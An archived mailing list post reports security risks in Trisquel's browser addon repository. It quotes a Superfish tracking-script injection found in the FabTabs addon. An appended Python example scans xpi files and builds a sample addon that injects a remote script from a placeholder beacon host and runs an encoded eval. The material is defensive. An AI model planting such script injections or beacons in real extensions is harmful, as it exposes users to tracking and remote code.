[Trisquel-devel] Trisquel addon repository has security risks

Luke gaming4jc2 at yahoo.com
Sun Dec 1 18:51:32 CET 2013


Hello,
I have noticed that the Trisquel aBrowser addon repository is
susceptible to several threat vectors.

1) Random users signing up and changing the download location of .xpi
files. This could be used to inject malicious code to unknowing users.

Solution:
a) Assign moderators who will check addons for approval similar to AMO
before going live.

b) Whitelist certain domains, e.g. only allow the URL to contain
download links from "https://addons.mozilla.org" since they are
generally being checked by others.

2) Non-free blobs can still exist in supposedly free code and must be
reviewed. Taking for example a recent finding in FabTabs:
https://trisquel.info/en/browser/addons/fabtabs

While manually inspecting the code I found this interesting line
located in "/chrome/content/fabtab/content.js":
script.src =
'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';

This code appears to be a web beacon and directly links to non-free
code outside of the original xpi! Thankfully this outside code appears
only to have analytics/tracking built in and not actual malicious
intent other than ensuring HTTPS is OFF whenever it queries the beacon
(contains URL rewrites). However, this opens the door for much larger
problems. Someone should be proactively studying extensions prior to
upload, and/or implementing a small filter which can catch certain
artifacts at minimum.

One such makeshift bash script I whipped up (could use some work):

# one xpi per pass; -a makes grep treat the extracted files as text
for f in *.xpi; do unzip -p "$f" | grep -a "http://\|https://\|eval(base64_decode"; done

This outputs all links and any base64 found inside of an xpi to the
terminal, and can catch the superfish web beacon.


Just some thoughts. :)



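The two checks proposed in the message above, the download-location allow list (threat 1) and an artifact filter over the files inside an xpi (threat 2), written out as an added Python example that is not part of the original post or of the Trisquel repository code. The xpi it scans is constructed in memory, and the beacon host it contains (beacon.example.invalid) is a placeholder, not the one quoted in the message.

```python
import io, re, zipfile
from urllib.parse import urlparse

# Hosts the repository would accept as an .xpi download location (threat 1).
ALLOWED_DOWNLOAD_HOSTS = {"addons.mozilla.org"}
# Files inside the xpi worth reading as text; images and other binaries are skipped.
TEXT_SUFFIXES = (".js", ".jsm", ".html", ".xhtml", ".xul", ".css", ".json", ".rdf", ".manifest")
URL_RE = re.compile(rb"https?://[^\s'\"<>()]+")
EVAL_B64_RE = re.compile(rb"eval\s*\(\s*base64_decode")


def download_url_allowed(url: str) -> bool:
    """Threat 1: accept only HTTPS links whose host is exactly on the allow list."""
    parts = urlparse(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() in ALLOWED_DOWNLOAD_HOSTS


def scan_xpi(data: bytes) -> list:
    """Threat 2: report remote URLs and eval(base64_decode(...)) artifacts with
    file and line number so a reviewer can go straight to the code in question."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for info in xpi.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
                continue
            for lineno, line in enumerate(xpi.read(info.filename).splitlines(), 1):
                for match in URL_RE.finditer(line):
                    url = match.group().decode("utf-8", "replace")
                    findings.append({"file": info.filename, "line": lineno, "kind": "url",
                                     "value": url, "host": urlparse(url).hostname,
                                     "insecure": url.startswith("http://")})
                if EVAL_B64_RE.search(line):
                    findings.append({"file": info.filename, "line": lineno, "kind": "eval_base64",
                                     "value": line.decode("utf-8", "replace").strip()})
    return findings


def build_sample_xpi() -> bytes:
    """Constructed stand-in for an addon like the one described above: a content
    script that injects a remote script over plain HTTP, plus an encoded eval."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as xpi:
        xpi.writestr("install.rdf", "<RDF/>\n")
        xpi.writestr("chrome/content/fabtab/content.js",
                     "var script = document.createElement('script');\n"
                     "script.src = 'http://beacon.example.invalid/ws/sf_main.jsp?userId=c0ffee';\n"
                     "document.documentElement.appendChild(script);\n")
        xpi.writestr("chrome/content/fabtab/loader.js", "eval(base64_decode('ZG9fbm90aGluZygp'));\n")
    return buf.getvalue()
```

Run `scan_xpi(open("addon.xpi", "rb").read())` against a real file to list every remote URL and encoded eval it contains; `insecure` marks the plain-HTTP script loads that the message singles out.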
